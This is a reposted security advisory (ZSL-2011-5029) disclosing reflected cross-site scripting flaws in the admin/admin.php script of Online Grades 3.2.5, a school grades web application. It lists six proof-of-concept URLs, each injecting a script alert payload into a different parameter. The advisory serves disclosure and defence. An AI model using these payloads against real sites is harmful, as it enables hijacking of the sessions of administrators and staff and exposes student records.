Online Grades Project Team 3.2.5 Cross Site Scripting

2011.07.27
Credit: Gjoko 'LiquidWorm' Krstic
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Online Grades 3.2.5 Multiple XSS Vulnerabilites Vendor: Online Grades Project Team Product web page: http://www.onlinegrades.org Affected version: 3.2.5 Summary: Online Grades is the leading free-software project that allows K-12+ student grades attendance information to be posted onto a dynamic web site. Desc: Online Grades suffers from multiple cross-site scripting vulns. The issue is triggered when input passed via multiple parameters to the 'admin/admin.php' script is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Microsoft Windows XP Professional SP3 (EN) Apache 2.2.14 (Win32) PHP 5.3.1 MySQL 5.1.41 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2011-5029 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5029.php 22.07.2011 --- http://localhost/admin/admin.php?func=1"><script>alert(1)</script>&skin=classic http://localhost/admin/admin.php?func=0&skin=1"><script>alert(1)</script> http://localhost/admin/admin.php?func=0&todo=1"><script>alert(1)</script> http://localhost/admin/admin.php?func=0&what=1"><script>alert(1)</script>&who=Faculty http://localhost/admin/admin.php?func=0&what=mail&who=1"><script>alert(1)</script> http://localhost/admin/admin.php/>"><script>alert(1)</script>

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5029.php


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top